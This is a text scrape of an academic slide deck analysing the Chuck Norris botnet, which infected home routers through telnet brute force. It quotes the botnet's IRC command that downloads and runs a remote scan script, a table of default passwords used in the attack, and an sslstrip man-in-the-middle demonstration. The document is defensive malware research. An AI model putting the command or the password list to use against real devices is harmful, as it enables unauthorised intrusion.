Embedded Malware An Analysis of the Chuck Norris Botnet P. eleda, - - PowerPoint PPT Presentation
Embedded Malware An Analysis of the Chuck Norris Botnet P. eleda, R. Krej, J. Vykopal, M. Draar {celeda|vykopal|drasar}@ics.muni.cz, radek.krejci@mail.muni.cz The sixth European Conference on Computer Network Defense EC2ND
{celeda|vykopal|drasar}@ics.muni.cz, radek.krejci@mail.muni.cz The sixth European Conference on Computer Network Defense – EC2ND 28-29 October 2010, Berlin, Germany
Embedded Malware – An Analysis of the Chuck Norris Botnet 2 / 22
Internet
LAN LAN LAN LAN LAN
Embedded Malware – An Analysis of the Chuck Norris Botnet 3 / 22
Internet
LAN LAN LAN LAN LAN Firewall
Embedded Malware – An Analysis of the Chuck Norris Botnet 3 / 22
Internet
LAN LAN LAN LAN LAN Firewall AV protection
Embedded Malware – An Analysis of the Chuck Norris Botnet 3 / 22
Internet
LAN LAN LAN LAN LAN Firewall AV protection
But what is happening here?
Embedded Malware – An Analysis of the Chuck Norris Botnet 3 / 22
Client-side anti-* protection is used and well known.
Internet
Embedded Malware – An Analysis of the Chuck Norris Botnet 4 / 22
Client-side anti-* protection is used and well known. What could happen if we attack infrastructure?
Internet Internet Chuck Norris Botnet Attack
Embedded Malware – An Analysis of the Chuck Norris Botnet 4 / 22
FlowMon probe FlowMon probe FlowMon probe NetFlow data generation
Embedded Malware – An Analysis of the Chuck Norris Botnet 5 / 22
FlowMon probe FlowMon probe FlowMon probe NetFlow data generation NetFlow collector NetFlow v5/v9 NetFlow data collection
Embedded Malware – An Analysis of the Chuck Norris Botnet 5 / 22
FlowMon probe FlowMon probe FlowMon probe NetFlow data generation NetFlow collector NetFlow v5/v9 NetFlow data collection NetFlow data analyses SPAM detection worm/virus detection intrusion detection
Embedded Malware – An Analysis of the Chuck Norris Botnet 5 / 22
FlowMon probe FlowMon probe FlowMon probe NetFlow data generation NetFlow collector NetFlow v5/v9 NetFlow data collection NetFlow data analyses SPAM detection worm/virus detection intrusion detection http mail syslog incident reporting mailbox WWW syslog server
Embedded Malware – An Analysis of the Chuck Norris Botnet 5 / 22
Worldwide TELNET scan attempts. Mostly comming from ADSL connections.
Embedded Malware – An Analysis of the Chuck Norris Botnet 6 / 22
Embedded Malware – An Analysis of the Chuck Norris Botnet 7 / 22
Linux malware – IRC bots with central C&C servers. Attacks poorly-configured Linux MIPSEL devices. Vulnerable devices – ADSL modems and routers. Uses TELNET brute force attack as infection vector. Users are not aware about the malicious activities. Missing anti-malware solution to detect it.
Discovered at Masaryk University on 2 December 2009. The malware got the Chuck Norris moniker from a comment in its source code [R]anger Killato : in nome di Chuck Norris !
Embedded Malware – An Analysis of the Chuck Norris Botnet 8 / 22
Botnet infiltration used from 12/2009 to 02/2010.
Embedded Malware – An Analysis of the Chuck Norris Botnet 9 / 22
IRC server bad guy
Botnet infiltration used from 12/2009 to 02/2010.
Embedded Malware – An Analysis of the Chuck Norris Botnet 9 / 22
IRC server bad guy bots
Botnet infiltration used from 12/2009 to 02/2010.
Embedded Malware – An Analysis of the Chuck Norris Botnet 9 / 22
IRC server bad guy bots WAN port ASUS WL-500gP (agent-provocateur)
Botnet infiltration used from 12/2009 to 02/2010.
Embedded Malware – An Analysis of the Chuck Norris Botnet 9 / 22
IRC server bad guy bots WAN port ASUS WL-500gP (agent-provocateur) FlowMon, tcpdump CSIRT-MU TAP
Botnet infiltration used from 12/2009 to 02/2010.
Embedded Malware – An Analysis of the Chuck Norris Botnet 9 / 22
infected device
Embedded Malware – An Analysis of the Chuck Norris Botnet 10 / 22
infected device
list of C class networks to scan
217.236. 88.253. ... 201.1. 200.121. ... 85.174. 222.215. ... 58.6. 220.240. ... 203.223. ...
IP Range Owner IP Range Owner 217.236.0.0/16 Deutsche Telekom 88.253.0.0/16 TurkTelekom 87.22.0.0/16 Telecom Italia 220.240.0.0/16 Comindico Australia 85.174.0.0/16 Volgograd Electro Svyaz 222.215.0.0/16 China Telecom 201.1.0.0/16 Telecomunicacoes de Sao Paulo 200.121.0.0/16 Telefonica del Peru
Table 1: Example of botnet propagation targets.
Embedded Malware – An Analysis of the Chuck Norris Botnet 10 / 22
infected device
list of C class networks to scan
217.236. 88.253. ... 201.1. 200.121. ... 85.174. 222.215. ... 58.6. 220.240. ... 203.223. ...
pnscan (port 23) IP Range Owner IP Range Owner 217.236.0.0/16 Deutsche Telekom 88.253.0.0/16 TurkTelekom 87.22.0.0/16 Telecom Italia 220.240.0.0/16 Comindico Australia 85.174.0.0/16 Volgograd Electro Svyaz 222.215.0.0/16 China Telecom 201.1.0.0/16 Telecomunicacoes de Sao Paulo 200.121.0.0/16 Telefonica del Peru
Table 1: Example of botnet propagation targets.
Embedded Malware – An Analysis of the Chuck Norris Botnet 10 / 22
infected device
list of C class networks to scan
217.236. 88.253. ... 201.1. 200.121. ... 85.174. 222.215. ... 58.6. 220.240. ... 203.223. ...
pnscan (port 23) list of possible victims IP Range Owner IP Range Owner 217.236.0.0/16 Deutsche Telekom 88.253.0.0/16 TurkTelekom 87.22.0.0/16 Telecom Italia 220.240.0.0/16 Comindico Australia 85.174.0.0/16 Volgograd Electro Svyaz 222.215.0.0/16 China Telecom 201.1.0.0/16 Telecomunicacoes de Sao Paulo 200.121.0.0/16 Telefonica del Peru
Table 1: Example of botnet propagation targets.
Embedded Malware – An Analysis of the Chuck Norris Botnet 10 / 22
infected device victim
Embedded Malware – An Analysis of the Chuck Norris Botnet 11 / 22
infected device victim
TELNET service dictionary attack
User Password root admin, Admin, password, root, 1234, private, XA1bac0MX, adsl1234, %%fuckinside%%, dreambox, blank password admin admin, password, blank password 1234 1234Admin
Table 2: Passwords used for a dictionary attack.
Embedded Malware – An Analysis of the Chuck Norris Botnet 11 / 22
infected device victim
TELNET service dictionary attack
web server
download current bot version
User Password root admin, Admin, password, root, 1234, private, XA1bac0MX, adsl1234, %%fuckinside%%, dreambox, blank password admin admin, password, blank password 1234 1234Admin
Table 2: Passwords used for a dictionary attack.
Embedded Malware – An Analysis of the Chuck Norris Botnet 11 / 22
STOP
bot deny remote access (ports 22-80)
infected device
Embedded Malware – An Analysis of the Chuck Norris Botnet 12 / 22
STOP
bot deny remote access (ports 22-80)
infected device
C&C (IRC) server
Embedded Malware – An Analysis of the Chuck Norris Botnet 12 / 22
STOP
bot deny remote access (ports 22-80)
infected device
C&C (IRC) server
(get scan-tools)
Initial Command (IRC Topic):
:!* sh wget http://87.98.163.86/pwn/scan.sh;chmod u+x scan.sh;./scan.sh
Embedded Malware – An Analysis of the Chuck Norris Botnet 12 / 22
STOP
bot deny remote access (ports 22-80)
infected device
C&C (IRC) server
(get scan-tools)
Initial Command (IRC Topic):
:!* sh wget http://87.98.163.86/pwn/scan.sh;chmod u+x scan.sh;./scan.sh
Embedded Malware – An Analysis of the Chuck Norris Botnet 12 / 22
Botnet Threats Denial-of-Service attacks – DoS, DDoS. DNS spoofing attack. Infected device reconfiguration. Consequences for Users The link was saturated with malicious traffic activities. Economic losses and criminal sanctions against unaware users.
Embedded Malware – An Analysis of the Chuck Norris Botnet 13 / 22
DNS Spoofing Attack Web page redirect:
www.facebook.com www.google.com
Malicious code execution.
primary DNS server secondary DNS server victim infected router
OpenDNS.com botnet C&C Center
www.facebook.com www.linux.org
www.linux.org
Embedded Malware – An Analysis of the Chuck Norris Botnet 14 / 22
DNS Spoofing Attack Web page redirect:
www.facebook.com www.google.com
Malicious code execution.
primary DNS server secondary DNS server victim infected router
OpenDNS.com botnet C&C Center
www.facebook.com www.linux.org
www.linux.org
Embedded Malware – An Analysis of the Chuck Norris Botnet 14 / 22
DNS Spoofing Attack Web page redirect:
www.facebook.com www.google.com
Malicious code execution.
primary DNS server secondary DNS server victim infected router
OpenDNS.com botnet C&C Center
www.facebook.com www.linux.org
www.linux.org
Embedded Malware – An Analysis of the Chuck Norris Botnet 14 / 22
DNS Spoofing Attack Web page redirect:
www.facebook.com www.google.com
Malicious code execution.
primary DNS server secondary DNS server victim infected router
OpenDNS.com botnet C&C Center
www.facebook.com www.linux.org
www.linux.org
Embedded Malware – An Analysis of the Chuck Norris Botnet 14 / 22
Size estimation based on NetFlow data from Masaryk University. 33000 unique attackers (infected devices) from 10/2009 – 02/2010.
Most Infected ISPs Telefonica del Peru Global Village Telecom (Brazil) Turk Telecom Pakistan Telecommunication Company China Unicom Hebei Province Network
100000 200000 300000 400000 500000 Oct 1 Nov 1 Dec 1 Jan 1 Feb 1 Mar 1 Apr 1 500 1000 1500 2000 2500
Telnet Scans Against Masaryk University Network Unique Attackers
Telnet Scans Against Masaryk University Network
Unique attackers targeting the MU network Month Min Max Avr Mdn October 854 502 621 November 41 628 241 136 December 69 1321 366 325 January 9 1467 312 137 February 180 2004 670 560 Total 2004 414 354
Botnet stopped activity
Embedded Malware – An Analysis of the Chuck Norris Botnet 15 / 22
Size estimation based on NetFlow data from Masaryk University. 33000 unique attackers (infected devices) from 10/2009 – 02/2010.
Most Infected ISPs Telefonica del Peru Global Village Telecom (Brazil) Turk Telecom Pakistan Telecommunication Company China Unicom Hebei Province Network
100000 200000 300000 400000 500000 Oct 1 Nov 1 Dec 1 Jan 1 Feb 1 Mar 1 Apr 1 500 1000 1500 2000 2500
Telnet Scans Against Masaryk University Network Unique Attackers
Telnet Scans Against Masaryk University Network Unique Attackers
Unique attackers targeting the MU network Month Min Max Avr Mdn October 854 502 621 November 41 628 241 136 December 69 1321 366 325 January 9 1467 312 137 February 180 2004 670 560 Total 2004 414 354
Botnet stopped activity
Embedded Malware – An Analysis of the Chuck Norris Botnet 15 / 22
Size estimation based on NetFlow data from Masaryk University. 33000 unique attackers (infected devices) from 10/2009 – 02/2010.
Most Infected ISPs Telefonica del Peru Global Village Telecom (Brazil) Turk Telecom Pakistan Telecommunication Company China Unicom Hebei Province Network
100000 200000 300000 400000 500000 Oct 1 Nov 1 Dec 1 Jan 1 Feb 1 Mar 1 Apr 1 500 1000 1500 2000 2500
Telnet Scans Against Masaryk University Network Unique Attackers botnet discovery 2.12.2009 botnet shutdown 23.2.2010
Telnet Scans Against Masaryk University Network Unique Attackers
Unique attackers targeting the MU network Month Min Max Avr Mdn October 854 502 621 November 41 628 241 136 December 69 1321 366 325 January 9 1467 312 137 February 180 2004 670 560 Total 2004 414 354
Botnet stopped activity
Embedded Malware – An Analysis of the Chuck Norris Botnet 15 / 22
50 100 150 200 250 Source Subnet A.0.0.0/8 Oct 2009 Nov 2009 Dec 2009 Jan 2010 Feb 2010 Date 50 100 150 200 250 300 350 400 450 Unique Attackers
Embedded Malware – An Analysis of the Chuck Norris Botnet 16 / 22
Embedded Malware – An Analysis of the Chuck Norris Botnet 17 / 22
Features Our extension to Chuck Norris Botnet. Based on MITM (Man-In-The-Middle) attack presented by Moxie Marlinspike at Black Hat DC (02/2009). Infected host operates as transparent HTTP proxy. We don’t attack HTTPS directly (invalid certificates). Vulnerable Systems Any site providing HTTP → HTTPS redirect. Can’t be detected on web server side. No invalid certificates on client side.
Embedded Malware – An Analysis of the Chuck Norris Botnet 18 / 22
access point web service
https://mail.google.com
user
86.49.xxx.yyy
(mitm - sslstrip)
MITM attack using sslstrip tool and infected host.
Embedded Malware – An Analysis of the Chuck Norris Botnet 19 / 22
access point web service
https://mail.google.com
user
86.49.xxx.yyy
(mitm - sslstrip)
GET HTTP mail.google.com
MITM attack using sslstrip tool and infected host.
Embedded Malware – An Analysis of the Chuck Norris Botnet 19 / 22
access point web service
https://mail.google.com
user
86.49.xxx.yyy
(mitm - sslstrip)
GET HTTP mail.google.com HTTP 301 Moved Permanently https://mail.google.com HTTP 301 Moved Permanently http://mail.google.com
MITM attack using sslstrip tool and infected host.
Embedded Malware – An Analysis of the Chuck Norris Botnet 19 / 22
access point web service
https://mail.google.com
user
86.49.xxx.yyy
(mitm - sslstrip)
GET HTTP mail.google.com HTTP 301 Moved Permanently https://mail.google.com HTTP 301 Moved Permanently http://mail.google.com GET HTTP mail.google.com SSL mail.google.com Client hello
MITM attack using sslstrip tool and infected host.
Embedded Malware – An Analysis of the Chuck Norris Botnet 19 / 22
access point web service
https://mail.google.com
user
86.49.xxx.yyy
(mitm - sslstrip)
GET HTTP mail.google.com HTTP 301 Moved Permanently https://mail.google.com HTTP 301 Moved Permanently http://mail.google.com GET HTTP mail.google.com SSL mail.google.com Client hello SSL Server hello HTTP 200 OK ...
MITM attack using sslstrip tool and infected host.
Embedded Malware – An Analysis of the Chuck Norris Botnet 19 / 22
Embedded Malware – An Analysis of the Chuck Norris Botnet 20 / 22
Botnet Timeline Compilation timestamp in pnscan tool – 4.7.2008. First file uploaded to distribution servers – 19.5.2009. Botnet discovery at Masaryk University – 2.12.2009. Botnet shutdown (hibernation) – 23.2.2010 Botnet Summary There are not anti-* solutions for embedded/SoHo devices. Based on known techniques and components from Internet. Users are not aware about the attack or device infection. No response and collaboration from infected networks.
Embedded Malware – An Analysis of the Chuck Norris Botnet 21 / 22
Pavel Čeleda et al.
celeda@ics.muni.cz
Project CYBER
http://www.muni.cz/ics/cyber
This material is based upon work supported by the Czech Ministry of Defence under Contract No. OVMASUN200801.
Embedded Malware – An Analysis of the Chuck Norris Botnet 22 / 22